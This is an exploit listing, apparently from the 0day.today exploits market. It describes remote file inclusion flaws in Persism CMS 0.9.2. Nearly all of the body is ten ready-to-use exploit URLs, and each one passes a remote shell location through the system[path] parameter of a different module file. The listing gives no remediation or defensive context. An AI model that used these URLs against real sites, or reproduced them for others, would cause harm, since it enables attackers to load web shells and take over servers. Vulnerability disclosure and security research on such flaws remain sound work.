[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Persism CMS <= 0.9.2 system[path] Remote File Inclusion Vulnerabilities

Author
GoLd_M
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1831
Category
web applications
Date add
03-05-2007
Platform
unsorted
=======================================================================
Persism CMS <= 0.9.2 system[path] Remote File Inclusion Vulnerabilities
=======================================================================



# Persism Content Management System <= 0.9.2 Multiple Remote File Inclusion Vulnerabilities
# D.Script: http://www.persism.com/emil/0.9.2/0.9.2.tar.gz
# Discovered by: GolD_M = [Mahmood_ali]
# Exploit:[Path]/modules/blocks/headerfile.php?system[path]=Shell
# Exploit:[Path]/modules/files/blocks/latest_files.php?system[path]=Shell
# Exploit:[Path]/modules/filters/headerfile.php?system[path]=shell
# Exploit:[Path]/modules/forums/blocks/latest_posts.php?system[path]=shell
# Exploit:[Path]/modules/groups/headerfile.php?system[path]=shell
# Exploit:[Path]/modules/links/blocks/links.php?system[path]=shell
# Exploit:[Path]/modules/menu/headerfile.php?system[path]=shell
# Exploit:[Path]/modules/news/blocks/latest_news.php?system[path]=shell
# Exploit:[Path]/modules/settings/headerfile.php?system[path]=shell
# Exploit:[Path]/modules/users/headerfile.php?system[path]=shell



#  0day.today [2024-09-28]  #